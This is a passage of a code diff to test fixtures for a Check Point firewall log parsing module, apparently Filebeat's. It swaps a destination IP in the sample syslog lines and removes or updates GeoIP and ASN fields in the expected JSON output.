 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59657"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46150"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10899"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52344"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61472"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10900"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45922"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41392"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10901"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:28:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f03,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524483"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44152"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:28:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f03,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524483"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44152"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:28:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f10,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50523"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:28:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f10,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524496"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40246"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f1a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524506"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37140"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:28:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f10,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524496"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40246"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f1a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524506"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37140"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812f1a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51575"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812f1a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50946"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812f1a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54800"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10902"; xlatesrc:"0.0.0.0"]
diff --git a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log-expected.json b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log-expected.json
index b9f1c2c5bfb5..efe6fd5d6dab 100644
--- a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log-expected.json
+++ b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log-expected.json
@@ -145,16 +145,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26680,
         "client.port": 61794,
-        "destination.as.number": 25046,
-        "destination.as.organization.name": "Check Point Software Technologies LTD",
-        "destination.geo.city_name": "Tel Aviv",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "IL",
-        "destination.geo.country_name": "Israel",
-        "destination.geo.location.lat": 32.0678,
-        "destination.geo.location.lon": 34.7647,
-        "destination.geo.region_iso_code": "IL-TA",
-        "destination.geo.region_name": "Tel Aviv",
         "destination.ip": "194.29.39.10",
         "destination.port": 443,
         "event.action": "Accept",
@@ -267,13 +257,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10012,
         "client.port": 41566,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -386,13 +371,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10013,
         "client.port": 48698,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -505,13 +483,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10014,
         "client.port": 61150,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.36",
         "destination.port": 80,
         "event.action": "Accept",
@@ -624,13 +595,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26681,
         "client.port": 55110,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.81.142.43",
         "destination.port": 443,
         "event.action": "Accept",
@@ -743,13 +709,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26682,
         "client.port": 48718,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -862,13 +821,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26683,
         "client.port": 62206,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.41",
         "destination.port": 80,
         "event.action": "Accept",
@@ -981,13 +933,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26684,
         "client.port": 41596,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -1100,13 +1047,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10015,
         "client.port": 61180,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.36",
         "destination.port": 80,
         "event.action": "Accept",
@@ -1219,13 +1159,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10016,
         "client.port": 48732,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -1338,13 +1271,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 43354,
         "client.port": 62222,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.41",
         "destination.port": 80,
         "event.action": "Accept",
@@ -1457,13 +1383,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10017,
         "client.port": 61188,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.36",
         "destination.port": 80,
         "event.action": "Accept",
@@ -1576,13 +1495,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26685,
         "client.port": 41624,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -1695,13 +1609,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10018,
         "client.port": 48758,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -1814,13 +1721,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10019,
         "client.port": 62246,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.41",
         "destination.port": 80,
         "event.action": "Accept",
@@ -1933,13 +1833,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10020,
         "client.port": 41638,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -2052,13 +1947,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 43355,
         "client.port": 61224,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.36",
         "destination.port": 80,
         "event.action": "Accept",
@@ -2219,13 +2107,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 43356,
         "client.port": 48776,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -2311,16 +2192,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26686,
         "client.port": 51436,
-        "destination.as.number": 25046,
-        "destination.as.organization.name": "Check Point Software Technologies LTD",
-        "destination.geo.city_name": "Tel Aviv",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "IL",
-        "destination.geo.country_name": "Israel",
-        "destination.geo.location.lat": 32.0678,
-        "destination.geo.location.lon": 34.7647,
-        "destination.geo.region_iso_code": "IL-TA",
-        "destination.geo.region_name": "Tel Aviv",
         "destination.ip": "194.29.39.47",
         "destination.port": 443,
         "event.action": "Accept",
@@ -2541,13 +2412,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26687,
         "client.port": 62396,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.41",
         "destination.port": 80,
         "event.action": "Accept",
@@ -2660,13 +2524,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26688,
         "client.port": 48914,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -2779,13 +2636,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10021,
         "client.port": 41844,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -2898,13 +2750,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26689,
         "client.port": 62468,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.41",
         "destination.port": 80,
         "event.action": "Accept",
@@ -3017,13 +2862,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26690,
         "client.port": 61434,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.36",
         "destination.port": 80,
         "event.action": "Accept",
@@ -3136,13 +2974,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26691,
         "client.port": 41856,
-        "destination.as.number": 16625,
+        "destination.as.number": 35994,
         "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "104.99.234.45",
         "destination.port": 443,
         "event.action": "Accept",
@@ -3303,13 +3136,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26692,
         "client.port": 48990,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.31",
         "destination.port": 80,
         "event.action": "Accept",
@@ -3422,13 +3248,6 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 26693,
         "client.port": 62478,
-        "destination.as.number": 30148,
-        "destination.as.organization.name": "Sucuri",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "192.124.249.41",
         "destination.port": 80,
         "event.action": "Accept",
@@ -3541,13 +3360,8 @@
         "client.ip": "192.168.1.100",
         "client.nat.port": 10022,
         "client.port": 41864,
-        "destination.as.number": 16625,
